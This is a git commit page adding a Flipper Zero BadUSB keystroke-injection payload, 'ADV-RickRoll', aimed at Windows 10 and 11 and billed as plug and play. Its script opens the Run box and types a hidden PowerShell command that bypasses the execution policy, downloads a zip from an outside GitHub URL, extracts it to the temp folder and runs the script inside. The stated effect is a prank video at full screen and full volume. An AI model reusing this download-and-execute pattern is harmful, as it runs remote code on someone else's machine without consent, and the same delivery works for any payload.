Add files via upload
This commit is contained in:
parent
4bb7938257
commit
62c28339f4
1 changed files with 12 additions and 0 deletions
12
Payloads/FLIP-ADV-RickRoll/ADV-RickRoll.txt
Normal file
12
Payloads/FLIP-ADV-RickRoll/ADV-RickRoll.txt
Normal file
|
@ -0,0 +1,12 @@
|
||||||
|
* Title: ADV-RickRoll
|
||||||
|
* Author: I am Jakoby
|
||||||
|
* Description: This is a one liner payload that will Rick Roll your target. Video will be played a full screen and max volume.
|
||||||
|
* Upon deployment payload will pause until a mouse movement is detected and run once one is.
|
||||||
|
* Target: Windows 10, 11
|
||||||
|
* --------------------------------------------------------------------------------------
|
||||||
|
* THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
|
||||||
|
* --------------------------------------------------------------------------------------
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRING powershell -w h -NoP -NonI -Exec Bypass $U='https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/Assets/rr.zip';$Z="$env:TMP"+'\rr.zip';$D="$env:TMP"+'\rr';iwr -Uri $U -O $Z;Expand-Archive $Z -DestinationPath $D\ -Force;powershell $D\rr.ps1
|
||||||
|
ENTER
|
Loading…
Reference in a new issue